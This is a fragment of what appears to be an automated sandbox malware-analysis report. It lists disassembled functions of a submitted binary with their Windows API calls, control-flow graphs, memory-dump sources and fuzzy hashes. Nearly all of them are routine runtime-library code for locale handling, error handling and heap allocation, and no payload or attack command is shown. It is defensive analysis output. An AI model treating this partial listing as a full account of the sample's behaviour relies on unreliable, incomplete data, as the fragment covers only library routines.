                                                                                        • Part of subcall function 00F64C6D: _Deallocate.LIBCONCRT ref: 00F64C7C
                                                                                      Strings
                                                                                      • 0000000006:1@0000000005:@, xrefs: 00F63B1F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1675027103.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1675014046.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675074781.0000000000FE9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000000FFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000001100000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.000000000137E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675567478.00000000013F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675706373.00000000013F5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675736994.00000000013F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_f60000_kWYLtJ0Cn1.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Deallocate$AllocOffsetRectVirtual_strlen
                                                                                      • String ID: 0000000006:1@0000000005:@
                                                                                      • API String ID: 555218544-176982251
                                                                                      • Opcode ID: 3cbd0b6dc93dda7cfa2347a99cfb563f81eb495e15aa984f83c67ce6c7610483
                                                                                      • Instruction ID: aad0b5b437bf48619537a04a64c59685196ed84d32abeef7e5a0d65de45fc89d
                                                                                      • Opcode Fuzzy Hash: 3cbd0b6dc93dda7cfa2347a99cfb563f81eb495e15aa984f83c67ce6c7610483
                                                                                      • Instruction Fuzzy Hash: CA01D471A002186ADB04FB65EC53FEF7774AF85B10F104129F212772C2DE7CAA01A7A9
                                                                                      Function 00FA8650 Relevance: 2.5, APIs: 2, Instructions: 45COMMONLIBRARYCODE
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 69 fa8650-fa865c 70 fa865e-fa866b GetLastError 69->70 71 fa869f-fa86a5 69->71 72 fa867c 70->72 73 fa866d-fa867a 70->73 74 fa867f-fa8685 call fcc5e9 72->74 73->74 76 fa868a-fa869d SetLastError 74->76 76->71 77 fa86a6-fa86bb call f9c3a4 76->77
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(00000000,00000000,?,00FB4380,00000000,00000000,00000000,00000000,?,00FD13CC,29949A30,00F63ADC,00000000,00000000,00F63ADC,00000000), ref: 00FA865E
                                                                                      • SetLastError.KERNEL32(00000000,00000000,00000000,00F63ADC,00000000,00000000,00F63ADC,00000000,00000000,?,00FBA303,?,?), ref: 00FA8694
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1675027103.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1675014046.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675074781.0000000000FE9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000000FFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000001100000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.000000000137E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675567478.00000000013F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675706373.00000000013F5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675736994.00000000013F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_f60000_kWYLtJ0Cn1.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorLast
                                                                                      • String ID:
                                                                                      • API String ID: 1452528299-0
                                                                                      • Opcode ID: 04f815d89705feaf58dad0180830e519c3e4770b1f09f2f34300920cd536edb8
                                                                                      • Instruction ID: a827e9f72763af3182dcb3e08c2b8f3ec887991cac00c1b36e59dc21ec636f3a
                                                                                      • Opcode Fuzzy Hash: 04f815d89705feaf58dad0180830e519c3e4770b1f09f2f34300920cd536edb8
                                                                                      • Instruction Fuzzy Hash: 2D01D6B2800249ABD710DF65C849B4AFBB8EF55760F24815AF40887200EBB5ED61EBD0
                                                                                      Function 00FCAE73 Relevance: 1.6, APIs: 1, Instructions: 57COMMONLIBRARYCODE
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 96 fcae73-fcae9b 97 fcae9d-fcae9f 96->97 98 fcaea1-fcaea3 96->98 99 fcaef2-fcaef5 97->99 100 fcaea9-fcaeb0 call fcada8 98->100 101 fcaea5-fcaea7 98->101 103 fcaeb5-fcaeb9 100->103 101->99 104 fcaed8-fcaeef 103->104 105 fcaebb-fcaec9 GetProcAddress 103->105 107 fcaef1 104->107 105->104 106 fcaecb-fcaed6 call fc7874 105->106 106->107 107->99
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1675027103.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1675014046.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675074781.0000000000FE9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000000FFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000001100000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.000000000137E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675567478.00000000013F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675706373.00000000013F5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675736994.00000000013F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_f60000_kWYLtJ0Cn1.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7b66d8ff9692dfaffb9f0f8186e1689902710b12b0734fa90a044d4f10f302f5
                                                                                      • Instruction ID: 65064cf5ab00f726362c141f096dab2bd80976ab842873080703dc1da6a10bf5
                                                                                      • Opcode Fuzzy Hash: 7b66d8ff9692dfaffb9f0f8186e1689902710b12b0734fa90a044d4f10f302f5
                                                                                      • Instruction Fuzzy Hash: ED01F533A4022E5B9B158E6AED42F5A379AEBC43347258128F905CB588EA30EC41B7D1
                                                                                      Function 00FCA7C1 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 110 fca7c1-fca7cc 111 fca7ce-fca7d8 110->111 112 fca7da-fca7e0 110->112 111->112 113 fca80e-fca819 call fbc47e 111->113 114 fca7f9-fca80a RtlAllocateHeap 112->114 115 fca7e2-fca7e3 112->115 119 fca81b-fca81d 113->119 116 fca80c 114->116 117 fca7e5-fca7ec call fc9f09 114->117 115->114 116->119 117->113 123 fca7ee-fca7f7 call fc5ae0 117->123 123->113 123->114
                                                                                      APIs
                                                                                      • RtlAllocateHeap.NTDLL(00000008,00F63ADC,00000000,?,00FCC62C,00000001,00000364,00000005,000000FF,00000000,00000000,?,00FA868A,00000000,?,00000000), ref: 00FCA802
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1675027103.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1675014046.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675074781.0000000000FE9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000000FFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000001100000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.000000000137E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675567478.00000000013F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675706373.00000000013F5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675736994.00000000013F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_f60000_kWYLtJ0Cn1.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap
                                                                                      • String ID:
                                                                                      • API String ID: 1279760036-0
                                                                                      • Opcode ID: f6186957832799d534047e9cbf95c6bc193fa1abb8c2f69741b57dc7760de308
                                                                                      • Instruction ID: 8e13f56262b5a0b51e4586abbdd07448161a5f58dca9eafa27a3bcbd16ed9400
                                                                                      • Opcode Fuzzy Hash: f6186957832799d534047e9cbf95c6bc193fa1abb8c2f69741b57dc7760de308
                                                                                      • Instruction Fuzzy Hash: 97F0243290412F6BEB215A728F07F5B3768BF41774B24812EA8049A0C0CA24F801B2F2

                                                                                      Non-executed Functions

                                                                                      Function 00FD9431 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetLocaleInfoW.KERNEL32(51CEB70F,2000000B,00000000,00000002,00000000,?,?,?,00FD974F,?,00000000), ref: 00FD94CA
                                                                                      • GetLocaleInfoW.KERNEL32(51CEB70F,20001004,00000000,00000002,00000000,?,?,?,00FD974F,?,00000000), ref: 00FD94F3
                                                                                      • GetACP.KERNEL32(?,?,00FD974F,?,00000000), ref: 00FD9508
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1675027103.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1675014046.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675074781.0000000000FE9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000000FFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000001100000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.000000000137E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675567478.00000000013F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675706373.00000000013F5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675736994.00000000013F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_f60000_kWYLtJ0Cn1.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: InfoLocale
                                                                                      • String ID: ACP$OCP
                                                                                      • API String ID: 2299586839-711371036
                                                                                      • Opcode ID: ae3d476637d9ecf266ce08a976ae048e193bbde7c298fb941f048e5cfce9185a
                                                                                      • Instruction ID: 97789e69ab236576f56f4d0f1ab4e0c3f78e63cccc94a4959f3ced46ae057b3a
                                                                                      • Opcode Fuzzy Hash: ae3d476637d9ecf266ce08a976ae048e193bbde7c298fb941f048e5cfce9185a
                                                                                      • Instruction Fuzzy Hash: 8D21C432A08105A6DB31CF94D900B9773A7AF55B74B2EC026E90AC7316E7B2DD42F350
                                                                                      Function 00FD9606 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00FCC3E7: GetLastError.KERNEL32(?,00000008,00FCA5D6), ref: 00FCC3EB
                                                                                        • Part of subcall function 00FCC3E7: SetLastError.KERNEL32(00000000), ref: 00FCC48D
                                                                                      • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 00FD9712
                                                                                      • IsValidCodePage.KERNEL32(00000000), ref: 00FD975B
                                                                                      • IsValidLocale.KERNEL32(?,00000001), ref: 00FD976A
                                                                                      • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00FD97B2
                                                                                      • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 00FD97D1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1675027103.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1675014046.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675074781.0000000000FE9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000000FFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000001100000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.000000000137E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675567478.00000000013F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675706373.00000000013F5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675736994.00000000013F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_f60000_kWYLtJ0Cn1.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                      • String ID:
                                                                                      • API String ID: 415426439-0
                                                                                      • Opcode ID: 9e7d7b9bf0c48c2d8476afadb306b99715eef0f1f6ffefc5d12ddc3a7a0e5720
                                                                                      • Instruction ID: 42b22428fee5c5db568a088ea9b01208ea44904d32d22ce3e99ad266ccc4d25d
                                                                                      • Opcode Fuzzy Hash: 9e7d7b9bf0c48c2d8476afadb306b99715eef0f1f6ffefc5d12ddc3a7a0e5720
                                                                                      • Instruction Fuzzy Hash: 00518172D1420AAFDF10DFE5DC85AAA73BAFF04350F08442AE515E7290EBB4D900AB60
                                                                                      Function 00FD8C84 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00FCC3E7: GetLastError.KERNEL32(?,00000008,00FCA5D6), ref: 00FCC3EB
                                                                                        • Part of subcall function 00FCC3E7: SetLastError.KERNEL32(00000000), ref: 00FCC48D
                                                                                      • GetACP.KERNEL32(?,?,?,?,?,?,00FC8CB2,?,?,?,?,?,-00000050,?,?,?), ref: 00FD8D45
                                                                                      • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00FC8CB2,?,?,?,?,?,-00000050,?,?), ref: 00FD8D70
                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 00FD8ED3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1675027103.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1675014046.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675074781.0000000000FE9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000000FFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000001100000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.000000000137E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675567478.00000000013F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675706373.00000000013F5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675736994.00000000013F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_f60000_kWYLtJ0Cn1.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$CodeInfoLocalePageValid
                                                                                      • String ID: utf8
                                                                                      • API String ID: 607553120-905460609
                                                                                      • Opcode ID: 66f7c7a199621ddf30cdd5bfe0e155c099290e84f635f10ddce18a9d5329947e
                                                                                      • Instruction ID: 8e79e8c303c6b45f29b0f52239a0b7a71d36cce347320f1988a1fb7a11a0d86c
                                                                                      • Opcode Fuzzy Hash: 66f7c7a199621ddf30cdd5bfe0e155c099290e84f635f10ddce18a9d5329947e
                                                                                      • Instruction Fuzzy Hash: B0710672A00206AADB24AB75CC46FB673AAEF54790F18442BF505D72C1EE74DD42AB60
                                                                                      Function 00FD90B5 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00FCC3E7: GetLastError.KERNEL32(?,00000008,00FCA5D6), ref: 00FCC3EB
                                                                                        • Part of subcall function 00FCC3E7: SetLastError.KERNEL32(00000000), ref: 00FCC48D
                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00FD9109
                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00FD9153
                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00FD9219
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1675027103.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1675014046.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675074781.0000000000FE9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000000FFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000001100000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.000000000137E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675567478.00000000013F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675706373.00000000013F5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675736994.00000000013F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_f60000_kWYLtJ0Cn1.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: InfoLocale$ErrorLast
                                                                                      • String ID:
                                                                                      • API String ID: 661929714-0
                                                                                      • Opcode ID: 78f82c80190e407e1656dfa04baa05daead5a209f5eb6968ba766ebeb64101ac
                                                                                      • Instruction ID: 7d47e9148b7bb4570ce649ef851cc56654c392e0e0f223562447a904ab684280
                                                                                      • Opcode Fuzzy Hash: 78f82c80190e407e1656dfa04baa05daead5a209f5eb6968ba766ebeb64101ac
                                                                                      • Instruction Fuzzy Hash: A761E131908107AFDB28DF64CC86BBA77AAEF05311F18417AE905C6385E7B9D981EB50
                                                                                      Function 00FD25F2 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000000), ref: 00FD281F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1675027103.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1675014046.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675074781.0000000000FE9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000000FFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000001100000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.000000000137E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675567478.00000000013F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675706373.00000000013F5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675736994.00000000013F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_f60000_kWYLtJ0Cn1.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ExceptionRaise
                                                                                      • String ID:
                                                                                      • API String ID: 3997070919-0
                                                                                      • Opcode ID: 9475664af5e29210af0c3e488bdc8b14cb88e818eda3e0f465d1d6a4e164c891
                                                                                      • Instruction ID: 190a38e17baaf27bdd5075e863cf05c42a68b32814a9e789552681e06d483417
                                                                                      • Opcode Fuzzy Hash: 9475664af5e29210af0c3e488bdc8b14cb88e818eda3e0f465d1d6a4e164c891
                                                                                      • Instruction Fuzzy Hash: 2DB16F31610605CFD769CF28C486B547BA1FF54364F29865AE899CF3A1C335E982EB80
                                                                                      Function 00FD9308 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00FCC3E7: GetLastError.KERNEL32(?,00000008,00FCA5D6), ref: 00FCC3EB
                                                                                        • Part of subcall function 00FCC3E7: SetLastError.KERNEL32(00000000), ref: 00FCC48D
                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00FD935C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1675027103.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1675014046.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675074781.0000000000FE9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000000FFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000001100000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.000000000137E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675567478.00000000013F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675706373.00000000013F5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675736994.00000000013F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_f60000_kWYLtJ0Cn1.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$InfoLocale
                                                                                      • String ID:
                                                                                      • API String ID: 3736152602-0
                                                                                      • Opcode ID: f05d99c1294fb13d8dc9e45768285b5193c5020504394a54d91a624f7e5afebf
                                                                                      • Instruction ID: bce2f75a20b07244f359cc02e98dd3f413fd6fd19a5e47bf14f26b07677c1cba
                                                                                      • Opcode Fuzzy Hash: f05d99c1294fb13d8dc9e45768285b5193c5020504394a54d91a624f7e5afebf
                                                                                      • Instruction Fuzzy Hash: CA21B632A182069BDF18AB54DC42FBE73ADEF45314B18407FF901D6281E6B9DD00EB50
                                                                                      Function 00FD8F8F Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00FCC3E7: GetLastError.KERNEL32(?,00000008,00FCA5D6), ref: 00FCC3EB
                                                                                        • Part of subcall function 00FCC3E7: SetLastError.KERNEL32(00000000), ref: 00FCC48D
                                                                                      • EnumSystemLocalesW.KERNEL32(00FD90B5,00000001,00000000,?,?,?,00FD96E6,00000000,?,?,?), ref: 00FD9001
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1675027103.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1675014046.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675074781.0000000000FE9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000000FFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000001100000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.000000000137E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675567478.00000000013F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675706373.00000000013F5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675736994.00000000013F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_f60000_kWYLtJ0Cn1.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                                      • String ID:
                                                                                      • API String ID: 2417226690-0
                                                                                      • Opcode ID: 2e3b7ddbf12f18d85072dce9915bc2ea7bb4e3b56f18e877829e354790268a67
                                                                                      • Instruction ID: 9fcf3a13deccbe70b4137232d92193e0531626ca3fb8833e9cdcbb4e6931b28b
                                                                                      • Opcode Fuzzy Hash: 2e3b7ddbf12f18d85072dce9915bc2ea7bb4e3b56f18e877829e354790268a67
                                                                                      • Instruction Fuzzy Hash: 751129366047015FDB189F79D89557ABB93FF80368B18442EE58787B40D775A903D740
                                                                                      Function 00FD9537 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00FCC3E7: GetLastError.KERNEL32(?,00000008,00FCA5D6), ref: 00FCC3EB
                                                                                        • Part of subcall function 00FCC3E7: SetLastError.KERNEL32(00000000), ref: 00FCC48D
                                                                                      • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00FD92D1,00000000,00000000,?), ref: 00FD9563
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1675027103.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1675014046.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675074781.0000000000FE9000.00000002.00000001.01000000.00000003.sdmpDownload File
